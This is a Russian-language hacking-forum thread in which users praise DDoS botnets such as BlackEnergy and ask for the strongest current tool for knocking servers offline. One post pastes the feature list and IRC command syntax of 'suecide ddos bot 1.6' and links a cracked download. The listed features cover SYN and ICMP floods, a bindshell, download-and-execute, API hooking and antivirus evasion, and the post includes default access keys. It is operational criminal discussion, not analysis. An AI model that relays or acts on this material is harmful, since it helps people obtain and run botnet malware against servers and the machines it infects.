• XSS.stack #1 – первый литературный журнал от юзеров форума

DDoS bot

Mail2k
А BlackEnergy не так сильно сервера колотит, он скорее мусорит, в свое время thuglife боты множество сегментов сети в парализованном состоянии держали, сейчас применить настолько же эффективно вряд ли удастся, но поколотить с десяток хороших серверов можно.

p.s. каждому свое в этой жизни, поверьте, не у меня одного хорошие впечатления от этой программки остались ;).

По теме ничего сказать не могу,так как ботами не занималась,но косяки которые тут указаны,поймёт самый начинающий реверсер!Говорит,это о том,
что качество на самом последнем месте,главное бабки сорвать побыстрому!
Нового уже нет давно,в паблике естестенно!Старая школа,кодеры-исследователи,где то далеко!Скорбно!

salamandra
Эта программка старая, и тем не менее это самая сильная "дубинка" в моих руках бывавшая, звучит как абсурд, но факт.

p.s. уже задался вопросом: что есть лучшая "дубинка" сегодня?

Mail2k
А BlackEnergy не так сильно сервера колотит, он скорее мусорит, в свое время thuglife боты множество сегментов сети в парализованном состоянии держали, сейчас применить настолько же эффективно вряд ли удастся, но поколотить с десяток хороших серверов можно.

p.s. каждому свое в этой жизни, поверьте, не у меня одного хорошие впечатления от этой программки остались wink.gif.

А админка переделанная на php осталась ?:)

Mail2k
А админка переделанная на php осталась ?
нужно поискать на харде, но боюсь она сгинула вместе с dvd дисками
переписать было проще чем установить cgi в первый раз :D

меня заинтересовал вопрос "модных дубинок", в продолжение темы :)

suecide ddos bot 1.6

Особенности:
- Управление на основе веб-бот и IRC
- Поддержка в IRC немного одновременно рабочих botmasters
- Аутентификация на МКС с помощью одной клавиши
- Отдел botmasters на уровне прав доступа
- Firewall detouring путем инъекций в код в процесс, возложенных
- Объезд по контролю за компонентами альтернативно приема метод обрабатывает и запуска в "опасный" код
- Маскирование в системе методом перехвата API-функций CreateProcessW, RegEnumValue, FindNextFileA, FindNextFileW
- Использование selfmodifycation код для защиты вашего строить из исследований (соответственно, никто не сможет узнать вашу конфигурацию в СЭП)
- Шифрование тела из бот по случайным образом порожденных ключом (который в паре с selfmodifycation код и собственные алгоритмы обнаружения полностью исключает из бот подпись анализаторы не будет создавать два идентичных копий в СЭП)
- ICMP-наводнение
- SYN-наводнение
- Плагин двигателя (можно загрузить любое количество подключаемых модулей "с наскока" в виде DLL-файлы)
- Отображение информации о контролируемых машина
- Bindshell
- А SOCKS4 прокси -
- Функция загрузки и запуска на любой файл
- Функция самоуничтожения
- Диалог с пользователем, контролируемой машины через MessageBox =)))
- А удобный веб-интерфейс с возможностью назначения для различных роботов разные команды
Список IRC-команд:
-! Вс хэша - разрешение для дальнейшего botnet контроля, хеширования должны быть получены с помощью программы hash.exe: hash.exe user_id_on_channel ключ. Одним из ключевых - любое значение целочисленного типа, по умолчанию для корневой (0 GID) - 3927555, для простых пользователей - 31337.
Например:
C: \> Хэш: RKL! Cr4sh@224BEAE1.EF026A60.32D84835.IP 31337
ул =: RKL! cr4sh@224BEAE1.EF026A60.32D84835.IP
ключ = 31337
Хэш = 48659496128643785403785944323783784324320
C: \>
Выход пользователь автоматически, в результате чего в канале.
-! МКЛПБ hostname_or_ip - наводнение ICMP-атаки на хост
-! Син hostname_or_ip - SYN-наводнение нападение на хост
-! Стоп - остановить атаку
-! Скачать filename_on_remote_machine URL - загрузить и выполнить. EXE-файл
-! Сообщение с текстом - показывать по захватили машину MessageBox с заданным текстом
-! Остановить - выключить IRC-клиент
-! Delplugin имя - удаление плагина в! updateplugins - обновить плагин сразу
-! Sysinf - просмотр информации о системе
-! Умереть - самоуничтожение
-! Установить значение частоты - частоты пакетной передачей по наводнения в миллисекундах (по умолчанию 4)
-! Packetsize установить значение - размер в ICMP-пакетов от наводнения в байтах (по умолчанию 50000)
-! Ключевых GID один ключ - создание ключа хэш-функции для отдельных GID. Простые пользователи GID 1, в первые 3 команды, которые доступны только для них

hxxp://rs325.rapidshare.com/files/132958313/Suicide_1.6_full_creck.rar

ammok
Попадали в руки сэмплы интересные, но названия ботов не знаю, очень интересные вещи. ;)

Кстати суицид есть родитель Black Energy, последний блэк энерджи, который продавался, хорош, но ему кое-чего не хватает, весьма технологичный бот, по сравнению с аналогами.

salamandra
Есть люди, которые тихо работают, о которых мы не знаем. Все самые высокие malware технологии лежат в паблике, бери да используй :)

SilverT
Все самые высокие malware технологии лежат в паблике, бери да используй :)
в паблике лежат исключительно заготовки, все по отдельности так сказать, что бы что-то дельное получилось - нужно долго и усердно трудиться "напильником"...

Попадали в руки сэмплы интересные, но названия ботов не знаю, очень интересные вещи.
я не сомневаюсь что есть что-то очень интересное и современное, но названия этому я тоже по сей день не открыл

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх